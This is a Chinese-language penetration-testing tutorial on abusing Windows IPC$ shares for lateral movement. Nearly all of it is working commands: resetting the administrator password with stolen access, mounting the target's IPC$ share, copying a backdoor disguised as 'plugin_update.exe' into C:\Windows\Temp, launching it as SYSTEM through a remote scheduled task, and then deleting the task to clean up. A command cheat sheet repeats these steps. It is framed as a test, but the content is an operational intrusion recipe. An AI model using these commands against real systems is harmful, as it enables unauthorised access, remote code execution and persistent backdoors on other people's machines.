簡介
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。
使用條件
1.開放了139、445端口; 2.目標開啟ipc$文件共享; 3.獲取用戶賬號密碼。
測試過程
此測試前提是獲取了ipc$, 這里測試的時候得到的權限是system,然后創建了一個admin賬戶,給了administrators權限,但無法復制文件過去,於是就改了administrator賬戶密碼(實戰中不建議更改,可讀取管理密碼后再用讀到的密碼)。 更改密碼:net user administrator "1qaz@WSX"
- 1.連接目標ipc$,將后門復制到目標機器上
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe
- 2.創建自動任務,執行上傳的后門程序
# 查看目標機器時間
net time \\193.168.1.12
# 創建該時間之后的某個時刻自動執行任務,任務名 plugin_update
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 如果不想等,可以立即運行后門程序
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 刪除創建的任務
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
接收端的目標機器已上線。 
常用命令
# 1.連接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看連接情況
net use
# 3.查看目標主機共享資源
net view \\193.168.1.12
# 4.查看目標主機時間
net time \\193.168.1.12
# 5.查看目標主機的NetBIOS用戶(自己本機也需開啟)
nbtstat -A 193.168.1.12
# 6.刪除連接
net use \\193.168.1.12\ipc$ /del
# 7.文件上傳下載
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe
(上傳到目標的:c\windows\temp\目錄下)
copy \\127.0.0.1\c$\test.exe c:\
(下載到本地c盤下)
# 8.創建計划任務
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.立即執行計划任務
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.刪除計划任務
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"